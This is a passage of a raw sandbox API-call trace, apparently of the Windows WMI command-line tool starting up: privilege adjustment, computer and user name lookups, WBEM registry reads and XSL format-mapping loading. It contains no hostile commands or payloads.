AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0xb54 [0041.835] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xffdc0 | out: lpSystemTimeAsFileTime=0xffdc0*(dwLowDateTime=0x2c42db00, dwHighDateTime=0x18d1aee)) [0041.836] GetCurrentProcessId () returned 0xb50 [0041.836] GetCurrentThreadId () returned 0xb54 [0041.836] GetTickCount () returned 0x1a082 [0041.836] QueryPerformanceCounter (in: lpPerformanceCount=0xffdc8 | out: lpPerformanceCount=0xffdc8*=16210466686) returned 1 [0041.836] GetModuleHandleW (lpModuleName=0x0) returned 0xff3e0000 [0041.836] __set_app_type (_Type=0x1) [0041.836] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff42ced0) returned 0x0 [0041.836] __wgetmainargs (in: _Argc=0xff452380, _Argv=0xff452390, _Env=0xff452388, _DoWildCard=0, _StartInfo=0xff45239c | out: _Argc=0xff452380, _Argv=0xff452390, _Env=0xff452388) returned 0 [0041.907] ??0CHString@@QEAA@XZ () returned 0xff452ab0 [0042.136] malloc (_Size=0x30) returned 0x405a50 [0042.163] malloc (_Size=0x70) returned 0x405a90 [0042.163] malloc (_Size=0x50) returned 0x407ac0 [0042.163] malloc (_Size=0x30) returned 0x407b20 [0042.163] malloc (_Size=0x48) returned 0x407b60 [0042.163] malloc (_Size=0x30) returned 0x407bb0 [0042.163] malloc (_Size=0x30) returned 0x407bf0 [0042.163] ??0CHString@@QEAA@XZ () returned 0xff452f58 [0042.163] malloc (_Size=0x30) returned 0x407c30 [0042.163] ?Empty@CHString@@QEAAXXZ () returned 0x7fef873482c [0042.163] SetConsoleCtrlHandler (HandlerRoutine=0xff425724, Add=1) returned 1 [0042.163] _onexit (_Func=0xff43f378) returned 0xff43f378 [0042.163] _onexit (_Func=0xff43f490) returned 0xff43f490 [0042.163] _onexit (_Func=0xff43f4d0) returned 0xff43f4d0 [0042.164] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.164] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0042.169] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0042.288] CoCreateInstance (in: rclsid=0xff3e73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3e7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff452940 | out: ppv=0xff452940*=0x1e31390) returned 0x0 [0042.655] GetCurrentProcess () returned 0xffffffffffffffff [0042.655] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xffb90 | out: TokenHandle=0xffb90*=0xf4) returned 1 [0042.655] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xffb88 | out: TokenInformation=0x0, ReturnLength=0xffb88) returned 0 [0042.655] malloc (_Size=0x118) returned 0x406400 [0042.655] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x406400, TokenInformationLength=0x118, ReturnLength=0xffb88 | out: TokenInformation=0x406400, ReturnLength=0xffb88) returned 1 [0042.655] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x406400*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-722031197, Attributes=0xd46b), (Luid.LowPart=0x0, Luid.HighPart=4226976, Attributes=0x0), (Luid.LowPart=0x6d0061, Luid.HighPart=4587552, Attributes=0x6c0069), (Luid.LowPart=0x43005c, Luid.HighPart=7143535, Attributes=0x6f006d), (Luid.LowPart=0x690046, Luid.HighPart=6619244, Attributes=0x73), (Luid.LowPart=0x6d006d, Luid.HighPart=7209071, Attributes=0x720050))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0042.655] free (_Block=0x406400) [0042.655] CloseHandle (hObject=0xf4) returned 1 [0042.759] malloc (_Size=0x40) returned 0x406400 [0042.759] malloc (_Size=0x40) returned 0x406450 [0042.759] malloc (_Size=0x40) returned 0x4064a0 [0042.759] malloc (_Size=0x20a) returned 0x4064f0 [0042.759] GetSystemDirectoryW (in: lpBuffer=0x4064f0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.759] free (_Block=0x4064f0) [0042.759] malloc (_Size=0x18) returned 0x2fdfb0 [0042.759] malloc (_Size=0x18) returned 0x407fa0 [0042.759] malloc (_Size=0x18) returned 0x4064f0 [0042.759] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0042.759] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0042.760] free (_Block=0x2fdfb0) [0042.760] free (_Block=0x407fa0) [0042.760] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76e30000 [0042.760] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0042.760] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0042.760] FreeLibrary (hLibModule=0x76e30000) returned 1 [0042.760] free (_Block=0x4064f0) [0042.761] _vsnwprintf (in: _Buffer=0x4064a0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xff7b8 | out: _Buffer="ms_409") returned 6 [0042.761] malloc (_Size=0x20) returned 0x407fa0 [0042.761] GetComputerNameW (in: lpBuffer=0x407fa0, nSize=0xffb90 | out: lpBuffer="XDUWTFONO", nSize=0xffb90) returned 1 [0042.761] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.761] malloc (_Size=0x14) returned 0x2fdfb0 [0042.761] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.761] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xffb88 | out: lpNameBuffer=0x0, nSize=0xffb88) returned 0x7fffffde000 [0042.762] GetLastError () returned 0xea [0042.762] malloc (_Size=0x40) returned 0x4064f0 [0042.762] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4064f0, nSize=0xffb88 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xffb88) returned 0x1 [0042.763] lstrlenW (lpString="") returned 0 [0042.763] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.763] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0042.765] lstrlenW (lpString=".") returned 1 [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0042.765] lstrlenW (lpString="LOCALHOST") returned 9 [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0042.765] free (_Block=0x2fdfb0) [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] malloc (_Size=0x14) returned 0x2fdfb0 [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] malloc (_Size=0x14) returned 0x406540 [0042.765] lstrlenW (lpString="XDUWTFONO") returned 9 [0042.765] malloc (_Size=0x8) returned 0x406560 [0042.765] malloc (_Size=0x18) returned 0x406580 [0042.765] malloc (_Size=0x30) returned 0x4065a0 [0042.765] malloc (_Size=0x18) returned 0x4065e0 [0042.765] SysStringLen (param_1="IDENTIFY") returned 0x8 [0042.765] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0042.765] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0042.765] SysStringLen (param_1="IDENTIFY") returned 0x8 [0042.765] malloc (_Size=0x30) returned 0x406600 [0042.765] malloc (_Size=0x18) returned 0x406640 [0042.766] SysStringLen (param_1="IMPERSONATE") returned 0xb [0042.766] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0042.766] SysStringLen (param_1="IMPERSONATE") returned 0xb [0042.766] SysStringLen (param_1="IDENTIFY") returned 0x8 [0042.766] SysStringLen (param_1="IDENTIFY") returned 0x8 [0042.766] SysStringLen (param_1="IMPERSONATE") returned 0xb [0042.766] malloc (_Size=0x30) returned 0x406660 [0042.766] malloc (_Size=0x18) returned 0x4066a0 [0042.766] SysStringLen (param_1="DELEGATE") returned 0x8 [0042.766] SysStringLen (param_1="IDENTIFY") returned 0x8 [0042.766] SysStringLen (param_1="DELEGATE") returned 0x8 [0042.766] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0042.766] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0042.766] SysStringLen (param_1="DELEGATE") returned 0x8 [0042.766] malloc (_Size=0x30) returned 0x4066c0 [0042.766] malloc (_Size=0x18) returned 0x406700 [0042.766] malloc (_Size=0x30) returned 0x406720 [0042.766] malloc (_Size=0x18) returned 0x406760 [0042.766] SysStringLen (param_1="NONE") returned 0x4 [0042.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0042.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0042.766] SysStringLen (param_1="NONE") returned 0x4 [0042.766] malloc (_Size=0x30) returned 0x406780 [0042.766] malloc (_Size=0x18) returned 0x4067c0 [0042.766] SysStringLen (param_1="CONNECT") returned 0x7 [0042.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0042.766] malloc (_Size=0x30) returned 0x4067e0 [0042.766] malloc (_Size=0x18) returned 0x406820 [0042.766] SysStringLen (param_1="CALL") returned 0x4 [0042.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0042.766] SysStringLen (param_1="CALL") returned 0x4 [0042.766] SysStringLen (param_1="CONNECT") returned 0x7 [0042.766] malloc (_Size=0x30) returned 0x406840 [0042.766] malloc (_Size=0x18) returned 0x406880 [0042.766] SysStringLen (param_1="PKT") returned 0x3 [0042.767] SysStringLen (param_1="DEFAULT") returned 0x7 [0042.767] SysStringLen (param_1="PKT") returned 0x3 [0042.767] SysStringLen (param_1="NONE") returned 0x4 [0042.767] SysStringLen (param_1="NONE") returned 0x4 [0042.767] SysStringLen (param_1="PKT") returned 0x3 [0042.767] malloc (_Size=0x30) returned 0x4068a0 [0042.767] malloc (_Size=0x18) returned 0x4068e0 [0042.767] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0042.767] SysStringLen (param_1="DEFAULT") returned 0x7 [0042.767] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0042.767] SysStringLen (param_1="NONE") returned 0x4 [0042.767] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0042.767] SysStringLen (param_1="PKT") returned 0x3 [0042.767] SysStringLen (param_1="PKT") returned 0x3 [0042.767] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0042.767] malloc (_Size=0x30) returned 0x408000 [0042.767] malloc (_Size=0x18) returned 0x406d00 [0042.767] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0042.767] SysStringLen (param_1="DEFAULT") returned 0x7 [0042.767] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0042.767] SysStringLen (param_1="PKT") returned 0x3 [0042.767] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0042.767] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0042.767] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0042.767] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0042.767] malloc (_Size=0x30) returned 0x408040 [0042.767] malloc (_Size=0x40) returned 0x406d20 [0042.767] malloc (_Size=0x20a) returned 0x408fd0 [0042.768] GetSystemDirectoryW (in: lpBuffer=0x408fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.768] free (_Block=0x408fd0) [0042.768] malloc (_Size=0x18) returned 0x406d70 [0042.768] malloc (_Size=0x18) returned 0x406d90 [0042.768] malloc (_Size=0x18) returned 0x406db0 [0042.768] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0042.768] SysStringLen (param_1="\\wbem\\") returned 0x6 [0042.768] free (_Block=0x406d70) [0042.768] free (_Block=0x406d90) [0042.768] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0042.768] free (_Block=0x406db0) [0042.768] malloc (_Size=0x18) returned 0x409000 [0042.768] malloc (_Size=0x18) returned 0x409020 [0042.768] malloc (_Size=0x18) returned 0x409040 [0042.768] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0042.768] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0042.768] free (_Block=0x409000) [0042.768] free (_Block=0x409020) [0042.768] GetCurrentThreadId () returned 0xb54 [0042.768] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xff490 | out: phkResult=0xff490*=0xf8) returned 0x0 [0042.769] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xff4e0, lpcbData=0xff480*=0x400 | out: lpType=0x0, lpData=0xff4e0*=0x30, lpcbData=0xff480*=0x4) returned 0x0 [0042.769] _wcsicmp (_String1="0", _String2="1") returned -1 [0042.769] _wcsicmp (_String1="0", _String2="2") returned -2 [0042.769] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xff480*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xff480*=0x42) returned 0x0 [0042.769] malloc (_Size=0x86) returned 0x406d70 [0042.769] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x406d70, lpcbData=0xff480*=0x42 | out: lpType=0x0, lpData=0x406d70*=0x25, lpcbData=0xff480*=0x42) returned 0x0 [0042.769] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0042.769] malloc (_Size=0x42) returned 0x406e00 [0042.769] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0042.769] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xff4e0, lpcbData=0xff480*=0x400 | out: lpType=0x0, lpData=0xff4e0*=0x36, lpcbData=0xff480*=0xc) returned 0x0 [0042.769] _wtol (_String="65536") returned 65536 [0042.769] free (_Block=0x406d70) [0042.769] RegCloseKey (hKey=0x0) returned 0x6 [0042.769] CoCreateInstance (in: rclsid=0xff3e7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3e73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xff988 | out: ppv=0xff988*=0x22971d0) returned 0x0 [0042.955] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x22971d0, xmlSource=0xffad0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x406d70), isSuccessful=0xffb40 | out: isSuccessful=0xffb40*=0xffff) returned 0x0 [0043.347] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22971d0, DOMElement=0xff980 | out: DOMElement=0xff980*=0x229bc50) returned 0x0 [0043.347] malloc (_Size=0x18) returned 0x409020 [0043.348] IXMLDOMElement:getElementsByTagName (in: This=0x229bc50, tagName="XSLFORMAT", resultList=0xff990 | out: resultList=0xff990*=0x2299cc0) returned 0x0 [0043.350] free (_Block=0x409020) [0043.350] IXMLDOMNodeList:get_length (in: This=0x2299cc0, listLength=0xffb58 | out: listLength=0xffb58*=21) returned 0x0 [0043.352] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=0, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.352] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="texttable.xsl") returned 0x0 [0043.352] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.353] malloc (_Size=0x18) returned 0x409020 [0043.353] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.353] free (_Block=0x409020) [0043.353] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x60070001c)) returned 0x0 [0043.353] malloc (_Size=0x18) returned 0x409020 [0043.353] malloc (_Size=0x18) returned 0x409000 [0043.353] malloc (_Size=0x30) returned 0x408080 [0043.353] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.353] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.353] IUnknown:Release (This=0x229a280) returned 0x0 [0043.353] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=1, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.353] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="textvaluelist.xsl") returned 0x0 [0043.353] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.353] malloc (_Size=0x18) returned 0x409060 [0043.353] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.353] free (_Block=0x409060) [0043.353] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x60070001c)) returned 0x0 [0043.354] malloc (_Size=0x18) returned 0x409060 [0043.354] malloc (_Size=0x18) returned 0x409080 [0043.354] SysStringLen (param_1="VALUE") returned 0x5 [0043.354] SysStringLen (param_1="TABLE") returned 0x5 [0043.354] SysStringLen (param_1="TABLE") returned 0x5 [0043.354] SysStringLen (param_1="VALUE") returned 0x5 [0043.354] malloc (_Size=0x30) returned 0x4080c0 [0043.354] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.354] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.354] IUnknown:Release (This=0x229a280) returned 0x0 [0043.354] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=2, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.354] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="textvaluelist.xsl") returned 0x0 [0043.354] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.354] malloc (_Size=0x18) returned 0x4090a0 [0043.354] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.354] free (_Block=0x4090a0) [0043.354] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x60070001c)) returned 0x0 [0043.354] malloc (_Size=0x18) returned 0x4090a0 [0043.354] malloc (_Size=0x18) returned 0x4090c0 [0043.354] SysStringLen (param_1="LIST") returned 0x4 [0043.354] SysStringLen (param_1="TABLE") returned 0x5 [0043.354] malloc (_Size=0x30) returned 0x408100 [0043.354] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.354] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.354] IUnknown:Release (This=0x229a280) returned 0x0 [0043.354] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=3, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.354] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="rawxml.xsl") returned 0x0 [0043.355] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.355] malloc (_Size=0x18) returned 0x4090e0 [0043.355] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.355] free (_Block=0x4090e0) [0043.355] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x60070001c)) returned 0x0 [0043.355] malloc (_Size=0x18) returned 0x4090e0 [0043.355] malloc (_Size=0x18) returned 0x409100 [0043.355] SysStringLen (param_1="RAWXML") returned 0x6 [0043.355] SysStringLen (param_1="TABLE") returned 0x5 [0043.355] SysStringLen (param_1="RAWXML") returned 0x6 [0043.355] SysStringLen (param_1="LIST") returned 0x4 [0043.355] SysStringLen (param_1="LIST") returned 0x4 [0043.355] SysStringLen (param_1="RAWXML") returned 0x6 [0043.355] malloc (_Size=0x30) returned 0x408140 [0043.355] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.355] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.355] IUnknown:Release (This=0x229a280) returned 0x0 [0043.355] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=4, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.355] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="htable.xsl") returned 0x0 [0043.355] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.355] malloc (_Size=0x18) returned 0x409120 [0043.355] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.355] free (_Block=0x409120) [0043.355] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x60070001c)) returned 0x0 [0043.355] malloc (_Size=0x18) returned 0x409120 [0043.356] malloc (_Size=0x18) returned 0x409140 [0043.356] SysStringLen (param_1="HTABLE") returned 0x6 [0043.356] SysStringLen (param_1="TABLE") returned 0x5 [0043.356] SysStringLen (param_1="HTABLE") returned 0x6 [0043.356] SysStringLen (param_1="LIST") returned 0x4 [0043.356] malloc (_Size=0x30) returned 0x408180 [0043.356] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.356] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.356] IUnknown:Release (This=0x229a280) returned 0x0 [0043.356] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=5, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.356] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="hform.xsl") returned 0x0 [0043.356] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.356] malloc (_Size=0x18) returned 0x409160 [0043.356] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.356] free (_Block=0x409160) [0043.356] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x60070001c)) returned 0x0 [0043.356] malloc (_Size=0x18) returned 0x409160 [0043.356] malloc (_Size=0x18) returned 0x409180 [0043.356] SysStringLen (param_1="HFORM") returned 0x5 [0043.356] SysStringLen (param_1="TABLE") returned 0x5 [0043.356] SysStringLen (param_1="HFORM") returned 0x5 [0043.356] SysStringLen (param_1="LIST") returned 0x4 [0043.356] SysStringLen (param_1="HFORM") returned 0x5 [0043.356] SysStringLen (param_1="HTABLE") returned 0x6 [0043.356] malloc (_Size=0x30) returned 0x4081c0 [0043.356] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.356] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.356] IUnknown:Release (This=0x229a280) returned 0x0 [0043.356] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=6, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.357] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="xml.xsl") returned 0x0 [0043.357] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.357] malloc (_Size=0x18) returned 0x4091a0 [0043.357] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.357] free (_Block=0x4091a0) [0043.357] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x60070001c)) returned 0x0 [0043.357] malloc (_Size=0x18) returned 0x4091a0 [0043.357] malloc (_Size=0x18) returned 0x4091c0 [0043.357] SysStringLen (param_1="XML") returned 0x3 [0043.357] SysStringLen (param_1="TABLE") returned 0x5 [0043.357] SysStringLen (param_1="XML") returned 0x3 [0043.357] SysStringLen (param_1="VALUE") returned 0x5 [0043.357] SysStringLen (param_1="VALUE") returned 0x5 [0043.357] SysStringLen (param_1="XML") returned 0x3 [0043.357] malloc (_Size=0x30) returned 0x408200 [0043.357] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.357] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.357] IUnknown:Release (This=0x229a280) returned 0x0 [0043.357] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=7, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.357] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="mof.xsl") returned 0x0 [0043.357] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.357] malloc (_Size=0x18) returned 0x4091e0 [0043.357] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.357] free (_Block=0x4091e0) [0043.358] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", 